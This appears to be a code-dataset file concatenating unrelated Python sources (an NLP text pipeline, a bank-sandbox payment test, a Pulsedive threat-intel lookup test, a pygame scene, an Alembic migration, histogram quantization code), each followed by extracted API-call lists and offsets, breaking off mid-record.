for line in lines:
print(line)
'''
def __init__(self, source, pattern):
self.source = source
self.pattern = pattern
def __getpaths__(self):
source = os.path.join(self.source, self.pattern)
files = glob.glob(source)
for filename in files:
yield os.path.join(source, filename)
def __iter__(self):
return self.__getpaths__()
class Stream():
'''
>>> lines = Stream(path)
>>> for line in lines:
print(line)
'''
def __init__(self,
encoding=None,
sentencizer=None,
text_filters=[]
):
self.encoding = encoding
self.__sentencizer = sentencizer
self.__text_filters = text_filters
def __call__(self,path):
"""Read lines from filepath."""
with open(path,'r',
encoding = (
self.encoding(path)
if callable(self.encoding)
else self.encoding)
) as fd:
# обрабатываем либо по предложению
if self.__sentencizer:
text = self.preprocess_text(fd.read())
for sentence in self.__sentencizer(text):
yield sentence
# либо по строке
else:
for line in fd:
yield line
def preprocess_text(self,text):
for text_filter in self.__text_filters:
text = text_filter(text)
return text
class Lemmatizer():
def __init__(self, lemmatizer=None,
allowed_tags=set(), disallowed_tags=set()):
self.lemmatize = lemmatizer
self.allowed_tags = set(allowed_tags) - set(disallowed_tags)
def __call__(self,data):
if isinstance(data,(str)):
data = [data]
self.allowed_tags
for lemma,pos in self.lemmatize(data,pos=True):
if self.allowed_tags:
if (self.allowed_tags) and (pos in self.allowed_tags):
yield lemma
else:
yield lemma
class Tokenizer():
def __init__(self,tokenizer=None):
self.tokenize = tokenizer
def __call__(self,data):
return self.tokenize(data)
class CharCleaner():
def __init__(self,cleaners=None):
self.cleaners = cleaners
def __call__(self,data):
for cleaner in self.cleaners:
data = cleaner(data)
return data
class TokenCleaner():
def __init__(self,cleaners=None):
self.cleaners = cleaners
def __call__(self,data):
for cleaner in self.cleaners:
data = cleaner(data)
return data
class LemmaCleaner():
def __init__(self,cleaners=None):
self.cleaners = cleaners
def __call__(self,data):
for cleaner in self.cleaners:
data = cleaner(data)
return data
| [
"os.path.join",
"glob.glob"
] | [((373, 412), 'os.path.join', 'os.path.join', (['self.source', 'self.pattern'], {}), '(self.source, self.pattern)\n', (385, 412), False, 'import glob, os, sys\n'), ((438, 455), 'glob.glob', 'glob.glob', (['source'], {}), '(source)\n', (447, 455), False, 'import glob, os, sys\n'), ((505, 535), 'os.path.join', 'os.path.join', (['source', 'filename'], {}), '(source, filename)\n', (517, 535), False, 'import glob, os, sys\n')] |
import requests
from opbank.opbank_client import OPBankClient
def test_opbank():
requests.delete("http://localhost:8888/admin/storage")
client = OPBankClient()
client.API_URL = 'http://localhost:8000/https://sandbox.apis.op-palvelut.fi/'
payer_iban = 'FI3959986920207073'
receiver_iban = 'FI2350009421535899'
amount = 5
accounts = client.get_accounts()
print('Account list before payment: {}'.format(accounts))
assert 2215.81 == accounts[payer_iban]['balance']
assert 0 == accounts[receiver_iban]['balance']
payment = client.init_payment(payer_iban, receiver_iban, amount)
payment_id = payment['paymentId']
print("Created payment {}".format(payment))
accounts = client.get_accounts()
print('Account list before confirmation: {}'.format(accounts))
assert 2215.81 == accounts[payer_iban]['balance']
assert 0 == accounts[receiver_iban]['balance']
confirmation = client.confirm_payment(payment_id)
accounts = client.get_accounts()
print('Account list after confirmation: {}'.format(accounts))
assert 2210.81 == accounts[payer_iban]['balance']
assert 5 == accounts[receiver_iban]['balance']
| [
"opbank.opbank_client.OPBankClient",
"requests.delete"
] | [((88, 142), 'requests.delete', 'requests.delete', (['"""http://localhost:8888/admin/storage"""'], {}), "('http://localhost:8888/admin/storage')\n", (103, 142), False, 'import requests\n'), ((157, 171), 'opbank.opbank_client.OPBankClient', 'OPBankClient', ([], {}), '()\n', (169, 171), False, 'from opbank.opbank_client import OPBankClient\n')] |
import pytest
from ctrlibrary.core.utils import get_observables
from ctrlibrary.threatresponse.enrich import enrich_refer_observables
from tests.functional.tests.constants import (
MODULE_NAME,
PULSEDIVE_URL,
OBSERVABLE_HUMAN_READABLE_NAME
)
from urllib.parse import quote
@pytest.mark.parametrize(
'observable,observable_type',
(
('1.1.1.1', 'ip'),
('brehmen.com', 'domain'),
('2a01:238:20a:202:1159::', 'ipv6'),
('http://juanthradio.com/Script/DOC/', 'url'),
)
)
def test_positive_refer_observable(module_headers, observable,
observable_type):
"""Perform testing for enrich refer observables endpoint to get
data for observable from Pulsedive
ID: CCTRI-1007-e6401994-dbef-4467-9792-72f80fd2faa1
Steps:
1. Send request to enrich refer observable endpoint
Expectedresults:
1. Check that data in response body contains expected refer field for
observable from Pulsedive
Importance: Critical
"""
observables = [{'type': observable_type, 'value': observable}]
response_from_all_modules = enrich_refer_observables(
payload=observables,
**{'headers': module_headers}
)
references = get_observables(response_from_all_modules, MODULE_NAME)
assert len(references) == 2, 'You got only one entity from Pusledive'
for reference in references:
assert reference['id'].startswith('ref-pulsedive') and (
reference['id'].endswith(
f'{observable_type}-{quote(observable, safe="")}'))
assert reference['module'] == MODULE_NAME
assert reference['module_instance_id']
assert reference['module_type_id']
if reference['title'].startswith('Search'):
assert reference['title'] == (
'Search for this '
f'{OBSERVABLE_HUMAN_READABLE_NAME[observable_type]}')
assert reference['description'] == (
'Lookup this '
f'{OBSERVABLE_HUMAN_READABLE_NAME[observable_type]} '
f'on {MODULE_NAME}')
assert reference['categories'] == [MODULE_NAME, 'Search']
assert reference['url'].startswith(f'{PULSEDIVE_URL}/browse/')
elif reference['title'].startswith('Browse'):
assert reference['title'] == (
f'Browse {OBSERVABLE_HUMAN_READABLE_NAME[observable_type]}')
assert reference['description'] == (
'Browse this '
f'{OBSERVABLE_HUMAN_READABLE_NAME[observable_type]}'
f' on {MODULE_NAME}')
assert reference['categories'] == [MODULE_NAME, 'Browse']
assert reference['url'].startswith(f'{PULSEDIVE_URL}/indicator/')
else:
raise AssertionError(f'Unknown reference: {reference["title"]!r}.')
| [
"pytest.mark.parametrize",
"ctrlibrary.threatresponse.enrich.enrich_refer_observables",
"ctrlibrary.core.utils.get_observables",
"urllib.parse.quote"
] | [((288, 483), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""observable,observable_type"""', "(('1.1.1.1', 'ip'), ('brehmen.com', 'domain'), ('2a01:238:20a:202:1159::',\n 'ipv6'), ('http://juanthradio.com/Script/DOC/', 'url'))"], {}), "('observable,observable_type', (('1.1.1.1', 'ip'), (\n 'brehmen.com', 'domain'), ('2a01:238:20a:202:1159::', 'ipv6'), (\n 'http://juanthradio.com/Script/DOC/', 'url')))\n", (311, 483), False, 'import pytest\n'), ((1136, 1212), 'ctrlibrary.threatresponse.enrich.enrich_refer_observables', 'enrich_refer_observables', ([], {'payload': 'observables'}), "(payload=observables, **{'headers': module_headers})\n", (1160, 1212), False, 'from ctrlibrary.threatresponse.enrich import enrich_refer_observables\n'), ((1253, 1308), 'ctrlibrary.core.utils.get_observables', 'get_observables', (['response_from_all_modules', 'MODULE_NAME'], {}), '(response_from_all_modules, MODULE_NAME)\n', (1268, 1308), False, 'from ctrlibrary.core.utils import get_observables\n'), ((1558, 1584), 'urllib.parse.quote', 'quote', (['observable'], {'safe': '""""""'}), "(observable, safe='')\n", (1563, 1584), False, 'from urllib.parse import quote\n')] |
import pygame
import constants
from player import *
from scene import *
from level01 import *
from level03 import *
from level02 import *
from customscene import *
import titlescene
class GameScene(Scene):
scr_w = constants.SCREENWIDTH
scr_h = constants.SCREENHEIGHT
def __init__(self, levelno):
super(GameScene, self).__init__()
# Create the player
self.player = Player()
self.player.inlevelno = levelno
# Create all the levels
self.level_list = []
self.level_list.append(Level_01(self.player))
self.level_list.append(Level_03(self.player))
# Set the current level
self.current_level_no = levelno
self.current_level = self.level_list[self.current_level_no]
self.player.level = self.current_level
self.active_sprite_list = pygame.sprite.Group()
self.set_player_pos()
# music
pygame.mixer.init()
self.music = pygame.mixer.music.load("music/jumpandrun.ogg")
pygame.mixer.music.play(-1)
def set_player_pos(self):
if self.current_level_no == 0:
self.player.rect.x = 0
self.player.rect.y = self.scr_h - self.player.rect.height
self.active_sprite_list.add(self.player)
else:
print("in player mirror")
self.player.rect.x = constants.SCREENWIDTH - 20
self.player.rect.y = 0
self.active_sprite_list.add(self.player)
def render(self, screen):
# ALL CODE TO DRAW SHOULD GO BELOW THIS COMMENT
self.current_level.draw(screen)
self.active_sprite_list.draw(screen)
# ALL CODE TO DRAW SHOULD GO ABOVE THIS COMMENT
def update(self):
# Update the player.
self.active_sprite_list.update()
# Update items in the level
self.current_level.update()
# If the player gets near the right side, shift the world left (-x)
if self.player.rect.right > self.scr_w:
self.player.rect.right = self.scr_w
# If the player gets near the left side, shift the world right (+x)
if self.player.rect.left < 0:
self.player.rect.left = 0
if self.player.level_completed():
self.player.goal_reached = False
self.current_level_no += 1
if self.current_level_no > len(self.level_list) - 1:
self.exit()
else:
self.current_level = self.level_list[self.current_level_no]
self.manager.go_to(GameScene(self.current_level_no))
def exit(self):
self.manager.go_to(CustomScene("You Won!"))
def die(self):
self.manager.go_to(CustomScene("You lose!"))
def handle_events(self, events):
if not self.current_level_no % 2:
for e in events:
if e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE:
self.manager.go_to(titlescene.TitleScene())
if e.type == pygame.KEYDOWN:
if e.key == pygame.K_LEFT:
self.player.go_left()
if e.key == pygame.K_RIGHT:
self.player.go_right()
if e.key == pygame.K_SPACE:
self.player.jump()
if e.type == pygame.KEYUP:
if e.key == pygame.K_LEFT and self.player.change_x < 0:
self.player.stop()
if e.key == pygame.K_RIGHT and self.player.change_x > 0:
self.player.stop()
if e.key == pygame.K_r:
self.set_player_pos()
# skip level (for testing)
if e.key == pygame.K_s:
self.manager.go_to(GameScene(1))
else:
for e in events:
if e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE:
self.manager.go_to(titlescene.TitleScene())
if e.type == pygame.KEYDOWN:
if e.key == pygame.K_LEFT:
self.player.go_right()
if e.key == pygame.K_RIGHT:
self.player.go_left()
if e.key == pygame.K_SPACE:
self.player.jump_mirror()
if e.type == pygame.KEYUP:
if e.key == pygame.K_LEFT and self.player.change_x > 0:
self.player.stop()
if e.key == pygame.K_RIGHT and self.player.change_x < 0:
self.player.stop()
if e.key == pygame.K_r:
self.set_player_pos()
#self.current_level.check_keys()
| [
"pygame.mixer.init",
"pygame.sprite.Group",
"titlescene.TitleScene",
"pygame.mixer.music.load",
"pygame.mixer.music.play"
] | [((845, 866), 'pygame.sprite.Group', 'pygame.sprite.Group', ([], {}), '()\n', (864, 866), False, 'import pygame\n'), ((923, 942), 'pygame.mixer.init', 'pygame.mixer.init', ([], {}), '()\n', (940, 942), False, 'import pygame\n'), ((964, 1011), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['"""music/jumpandrun.ogg"""'], {}), "('music/jumpandrun.ogg')\n", (987, 1011), False, 'import pygame\n'), ((1020, 1047), 'pygame.mixer.music.play', 'pygame.mixer.music.play', (['(-1)'], {}), '(-1)\n', (1043, 1047), False, 'import pygame\n'), ((2950, 2973), 'titlescene.TitleScene', 'titlescene.TitleScene', ([], {}), '()\n', (2971, 2973), False, 'import titlescene\n'), ((3975, 3998), 'titlescene.TitleScene', 'titlescene.TitleScene', ([], {}), '()\n', (3996, 3998), False, 'import titlescene\n')] |
"""Exceptions Table
Revision ID: 6245d75fa12
Revises: <PASSWORD>
Create Date: 2016-08-16 11:35:38.575026
"""
# revision identifiers, used by Alembic.
revision = '6245d75fa12'
down_revision = 'e0a6af364a3f'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('exceptions',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('source', sa.String(length=256), nullable=False),
sa.Column('occurred', sa.DateTime(), nullable=False),
sa.Column('ttl', sa.DateTime(), nullable=False),
sa.Column('type', sa.String(length=256), nullable=False),
sa.Column('message', sa.String(length=512), nullable=True),
sa.Column('stacktrace', sa.Text(), nullable=True),
sa.Column('region', sa.String(length=32), nullable=True),
sa.Column('tech_id', sa.Integer(), nullable=True),
sa.Column('item_id', sa.Integer(), nullable=True),
sa.Column('account_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['account_id'], ['account.id'], ),
sa.ForeignKeyConstraint(['item_id'], ['item.id'], ),
sa.ForeignKeyConstraint(['tech_id'], ['technology.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index('ix_exceptions_account_id', 'exceptions', ['account_id'], unique=False)
op.create_index('ix_exceptions_item_id', 'exceptions', ['item_id'], unique=False)
op.create_index('ix_exceptions_region', 'exceptions', ['region'], unique=False)
op.create_index('ix_exceptions_source', 'exceptions', ['source'], unique=False)
op.create_index('ix_exceptions_tech_id', 'exceptions', ['tech_id'], unique=False)
op.create_index('ix_exceptions_type', 'exceptions', ['type'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index('ix_exceptions_type', table_name='exceptions')
op.drop_index('ix_exceptions_tech_id', table_name='exceptions')
op.drop_index('ix_exceptions_source', table_name='exceptions')
op.drop_index('ix_exceptions_region', table_name='exceptions')
op.drop_index('ix_exceptions_item_id', table_name='exceptions')
op.drop_index('ix_exceptions_account_id', table_name='exceptions')
op.drop_table('exceptions')
### end Alembic commands ###
| [
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.DateTime",
"alembic.op.drop_table",
"sqlalchemy.Text",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.Integer",
"sqlalchemy.String",
"alembic.op.drop_index",
"sqlalchemy.BigInteger",
"alembic.op.create_index"
] | [((1239, 1330), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_account_id"""', '"""exceptions"""', "['account_id']"], {'unique': '(False)'}), "('ix_exceptions_account_id', 'exceptions', ['account_id'],\n unique=False)\n", (1254, 1330), False, 'from alembic import op\n'), ((1331, 1417), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_item_id"""', '"""exceptions"""', "['item_id']"], {'unique': '(False)'}), "('ix_exceptions_item_id', 'exceptions', ['item_id'], unique=\n False)\n", (1346, 1417), False, 'from alembic import op\n'), ((1417, 1496), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_region"""', '"""exceptions"""', "['region']"], {'unique': '(False)'}), "('ix_exceptions_region', 'exceptions', ['region'], unique=False)\n", (1432, 1496), False, 'from alembic import op\n'), ((1501, 1580), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_source"""', '"""exceptions"""', "['source']"], {'unique': '(False)'}), "('ix_exceptions_source', 'exceptions', ['source'], unique=False)\n", (1516, 1580), False, 'from alembic import op\n'), ((1585, 1671), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_tech_id"""', '"""exceptions"""', "['tech_id']"], {'unique': '(False)'}), "('ix_exceptions_tech_id', 'exceptions', ['tech_id'], unique=\n False)\n", (1600, 1671), False, 'from alembic import op\n'), ((1671, 1746), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_type"""', '"""exceptions"""', "['type']"], {'unique': '(False)'}), "('ix_exceptions_type', 'exceptions', ['type'], unique=False)\n", (1686, 1746), False, 'from alembic import op\n'), ((1867, 1927), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_type"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_type', table_name='exceptions')\n", (1880, 1927), False, 'from alembic import op\n'), ((1932, 1995), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_tech_id"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_tech_id', table_name='exceptions')\n", (1945, 1995), False, 'from alembic import op\n'), ((2000, 2062), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_source"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_source', table_name='exceptions')\n", (2013, 2062), False, 'from alembic import op\n'), ((2067, 2129), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_region"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_region', table_name='exceptions')\n", (2080, 2129), False, 'from alembic import op\n'), ((2134, 2197), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_item_id"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_item_id', table_name='exceptions')\n", (2147, 2197), False, 'from alembic import op\n'), ((2202, 2268), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_account_id"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_account_id', table_name='exceptions')\n", (2215, 2268), False, 'from alembic import op\n'), ((2273, 2300), 'alembic.op.drop_table', 'op.drop_table', (['"""exceptions"""'], {}), "('exceptions')\n", (2286, 2300), False, 'from alembic import op\n'), ((1016, 1071), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['account_id']", "['account.id']"], {}), "(['account_id'], ['account.id'])\n", (1039, 1071), True, 'import sqlalchemy as sa\n'), ((1079, 1128), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['item_id']", "['item.id']"], {}), "(['item_id'], ['item.id'])\n", (1102, 1128), True, 'import sqlalchemy as sa\n'), ((1136, 1191), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['tech_id']", "['technology.id']"], {}), "(['tech_id'], ['technology.id'])\n", (1159, 1191), True, 'import sqlalchemy as sa\n'), ((1199, 1228), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1222, 1228), True, 'import sqlalchemy as sa\n'), ((392, 407), 'sqlalchemy.BigInteger', 'sa.BigInteger', ([], {}), '()\n', (405, 407), True, 'import sqlalchemy as sa\n'), ((450, 471), 'sqlalchemy.String', 'sa.String', ([], {'length': '(256)'}), '(length=256)\n', (459, 471), True, 'import sqlalchemy as sa\n'), ((516, 529), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (527, 529), True, 'import sqlalchemy as sa\n'), ((569, 582), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (580, 582), True, 'import sqlalchemy as sa\n'), ((623, 644), 'sqlalchemy.String', 'sa.String', ([], {'length': '(256)'}), '(length=256)\n', (632, 644), True, 'import sqlalchemy as sa\n'), ((688, 709), 'sqlalchemy.String', 'sa.String', ([], {'length': '(512)'}), '(length=512)\n', (697, 709), True, 'import sqlalchemy as sa\n'), ((755, 764), 'sqlalchemy.Text', 'sa.Text', ([], {}), '()\n', (762, 764), True, 'import sqlalchemy as sa\n'), ((806, 826), 'sqlalchemy.String', 'sa.String', ([], {'length': '(32)'}), '(length=32)\n', (815, 826), True, 'import sqlalchemy as sa\n'), ((869, 881), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (879, 881), True, 'import sqlalchemy as sa\n'), ((924, 936), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (934, 936), True, 'import sqlalchemy as sa\n'), ((982, 994), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (992, 994), True, 'import sqlalchemy as sa\n')] |
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
from scipy import stats
class QuantizeLayer:
def __init__(self, name="None", num_bin=2001):
self.name = name
self.min = 0.0
self.max = 0.0
self.edge = 0.0
self.num_bins = num_bin
self.distribution_interval = 0.0
self.data_distribution = []
@staticmethod
def get_max_min_edge(blob_data):
max_val = np.max(blob_data)
min_val = np.min(blob_data)
data_edge = max(abs(max_val), abs(min_val))
return max_val, min_val, data_edge
def initial_histograms(self, blob_data):
max_val, min_val, data_edge = self.get_max_min_edge(blob_data)
hist, hist_edges = np.histogram(blob_data, bins=self.num_bins, range=(-data_edge, data_edge))
self.distribution_interval = 2 * data_edge / len(hist)
self.data_distribution = hist
self.edge = data_edge
self.min = min_val
self.max = max_val
def combine_histograms(self, blob_data):
"""
:param blob_data:
:return:
"""
# hist is the num of each bin, the edge of each bin is [)
max_val, min_val, data_edge = self.get_max_min_edge(blob_data)
if data_edge <= self.edge:
hist, _ = np.histogram(blob_data, bins=len(self.data_distribution), range=(-self.edge, self.edge))
self.data_distribution += hist
else:
old_num_bins = len(self.data_distribution)
old_step = 2 * self.edge / old_num_bins
half_increased_bins = int((data_edge - self.edge) // old_step + 1)
new_num_bins = half_increased_bins * 2 + old_num_bins
data_edge = half_increased_bins * old_step + self.edge
hist, hist_edges = np.histogram(blob_data, bins=new_num_bins, range=(-data_edge, data_edge))
hist[half_increased_bins:new_num_bins - half_increased_bins] += self.data_distribution
self.data_distribution = hist
self.edge = data_edge
self.min = min(min_val, self.min)
self.max = max(max_val, self.max)
self.distribution_interval = 2 * self.edge / len(self.data_distribution)
@staticmethod
def smooth_distribution(p, eps=0.0001):
is_zeros = (p == 0).astype(np.float32)
is_nonzeros = (p != 0).astype(np.float32)
n_zeros = is_zeros.sum()
n_nonzeros = p.size - n_zeros
if not n_nonzeros:
raise ValueError('The discrete probability distribution is malformed. All entries are 0.')
eps1 = eps * float(n_zeros) / float(n_nonzeros)
assert eps1 < 1.0, 'n_zeros=%d, n_nonzeros=%d, eps1=%f' % (n_zeros, n_nonzeros, eps1)
hist = p.astype(np.float32)
hist += eps * is_zeros + (-eps1) * is_nonzeros
assert (hist <= 0).sum() == 0
return hist
@property
def threshold_distribution(self, target_bin=256):
"""
:param quantized_dtype:
:param target_bin:
:return:
"""
num_bins = len(self.data_distribution)
distribution = self.data_distribution
assert (num_bins % 2 == 1)
# if min_val >= 0 and quantized_dtype in ['auto', 'uint8']:
# target_bin = 128
threshold_sum = sum(distribution[target_bin:])
kl_divergence = np.zeros(num_bins - target_bin)
for threshold in range(target_bin, num_bins):
sliced_nd_hist = copy.deepcopy(distribution[:threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
p[threshold - 1] += threshold_sum
threshold_sum = threshold_sum - distribution[threshold]
# is_nonzeros[k] indicates whether hist[k] is nonzero
p = np.array(p)
nonzero_loc = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = len(sliced_nd_hist) // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = nonzero_loc[start:stop].sum()
if norm != 0:
q[start:stop] = quantized_bins[j] / norm
q[p == 0] = 0.0001
p = self.smooth_distribution(p)
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.entropy(p, q)
min_kl_divergence = np.argmin(kl_divergence)
threshold_bin = min_kl_divergence + target_bin
threshold_value = (threshold_bin + 0.5) * self.distribution_interval + (-self.edge)
return threshold_value
@staticmethod
def max_slide_window(seq, m):
num = len(seq)
seq = seq.tolist()
assert isinstance(seq, (list, tuple, set)) and isinstance(m, int), "seq array"
assert len(seq) > m, "len(seq) must >m"
max_seq = 0
loc = 0
for i in range(0, num):
if (i + m) <= num:
temp_seq = seq[i:i + m]
temp_sum = sum(temp_seq)
if max_seq <= temp_sum:
max_seq = temp_sum
loc = i
else:
return max_seq, loc
@property
def distribution_min_max(self, target_bin=256):
num_bins = len(self.data_distribution)
distribution = self.data_distribution
assert (num_bins % 2 == 1)
kl_divergence = np.zeros(num_bins - target_bin)
kl_loc = np.zeros(num_bins - target_bin)
for threshold in range(target_bin, num_bins):
#print("num:", threshold)
_, loc = self.max_slide_window(distribution, threshold)
sliced_nd_hist = copy.deepcopy(distribution[loc:loc + threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
right_sum = sum(distribution[loc + threshold:])
left_sum = sum(distribution[:loc])
p[threshold - 1] += right_sum
p[0] += left_sum
# is_nonzeros[k] indicates whether hist[k] is nonzero
p = np.array(p)
nonzero_loc = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = len(sliced_nd_hist) // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = nonzero_loc[start:stop].sum()
if norm != 0:
q[start:stop] = quantized_bins[j] / norm
q[p == 0] = 0.0001
p = self.smooth_distribution(p)
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.entropy(p, q)
kl_loc[threshold - target_bin] = loc
min_kl_divergence = np.argmin(kl_divergence)
min = kl_loc[min_kl_divergence]
max = min + target_bin + min_kl_divergence
min = (min + 0.5) * self.distribution_interval + (-self.edge)
max = (max + 0.5) * self.distribution_interval + (-self.edge)
return min, max
@property
def distribution_test(self, target_bin=256):
num_bins = len(self.data_distribution)
distribution = self.data_distribution
assert (num_bins % 2 == 1)
kl_divergence = np.zeros(num_bins - target_bin)
kl_loc = np.zeros(num_bins - target_bin)
for threshold in range(target_bin, num_bins):
#print("num:", threshold)
_, loc = self.max_slide_window(distribution, threshold)
sliced_nd_hist = copy.deepcopy(distribution[loc:loc + threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
right_sum = sum(distribution[loc + threshold:])
left_sum = sum(distribution[:loc])
p[threshold - 1] += right_sum
p[0] += left_sum
# is_nonzeros[k] indicates whether hist[k] is nonzero
p = np.array(p)
nonzero_loc = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = len(sliced_nd_hist) // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = nonzero_loc[start:stop].sum()
if norm != 0:
q[start:stop] = quantized_bins[j] / norm
q[p == 0] = 0.0001
p = self.smooth_distribution(p)
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.wasserstein_distance(p, q)
kl_loc[threshold - target_bin] = loc
min_kl_divergence = np.argmin(kl_divergence)
min = kl_loc[min_kl_divergence]
max = min + target_bin + min_kl_divergence
min = (min + 0.5) * self.distribution_interval + (-self.edge)
max = (max + 0.5) * self.distribution_interval + (-self.edge)
return min, max
data = np.random.randn(10000,)
print(data)
layer = QuantizeLayer(name="con_1")
layer.initial_histograms(data)
print("min:", layer.min)
print("max:", layer.max)
print("edge:", layer.edge)
print("distribution_interval:", layer.distribution_interval)
print("bins:", len(layer.data_distribution))
data = np.random.randn(10000,).astype()
layer.combine_histograms(data)
print("min:", layer.min)
print("max:", layer.max)
print("edge:", layer.edge)
print("distribution_interval:", layer.distribution_interval)
print("bins:", len(layer.data_distribution))
data = np.random.randn(10000,)
data[9999] = 20
layer.combine_histograms(data)
print("min:", layer.min)
print("max:", layer.max)
print("edge:", layer.edge)
print("distribution_interval:", layer.distribution_interval)
print("bins:", len(layer.data_distribution))
import matplotlib.pyplot as plt
plt.plot(layer.data_distribution)
plt.show()
print(layer.threshold_distribution)
print(layer.distribution_min_max)
#print(layer.distribution_test) | [
"numpy.histogram",
"scipy.stats.entropy",
"copy.deepcopy",
"matplotlib.pyplot.plot",
"numpy.max",
"numpy.array",
"numpy.zeros",
"scipy.stats.wasserstein_distance",
"numpy.min",
"numpy.argmin",
"numpy.random.randn",
"matplotlib.pyplot.show"
] | [((11155, 11177), 'numpy.random.randn', 'np.random.randn', (['(10000)'], {}), '(10000)\n', (11170, 11177), True, 'import numpy as np\n'), ((11703, 11725), 'numpy.random.randn', 'np.random.randn', (['(10000)'], {}), '(10000)\n', (11718, 11725), True, 'import numpy as np\n'), ((11990, 12023), 'matplotlib.pyplot.plot', 'plt.plot', (['layer.data_distribution'], {}), '(layer.data_distribution)\n', (11998, 12023), True, 'import matplotlib.pyplot as plt\n'), ((12024, 12034), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12032, 12034), True, 'import matplotlib.pyplot as plt\n'), ((477, 494), 'numpy.max', 'np.max', (['blob_data'], {}), '(blob_data)\n', (483, 494), True, 'import numpy as np\n'), ((513, 530), 'numpy.min', 'np.min', (['blob_data'], {}), '(blob_data)\n', (519, 530), True, 'import numpy as np\n'), ((770, 844), 'numpy.histogram', 'np.histogram', (['blob_data'], {'bins': 'self.num_bins', 'range': '(-data_edge, data_edge)'}), '(blob_data, bins=self.num_bins, range=(-data_edge, data_edge))\n', (782, 844), True, 'import numpy as np\n'), ((3386, 3417), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (3394, 3417), True, 'import numpy as np\n'), ((5188, 5212), 'numpy.argmin', 'np.argmin', (['kl_divergence'], {}), '(kl_divergence)\n', (5197, 5212), True, 'import numpy as np\n'), ((6192, 6223), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (6200, 6223), True, 'import numpy as np\n'), ((6241, 6272), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (6249, 6272), True, 'import numpy as np\n'), ((8274, 8298), 'numpy.argmin', 'np.argmin', (['kl_divergence'], {}), 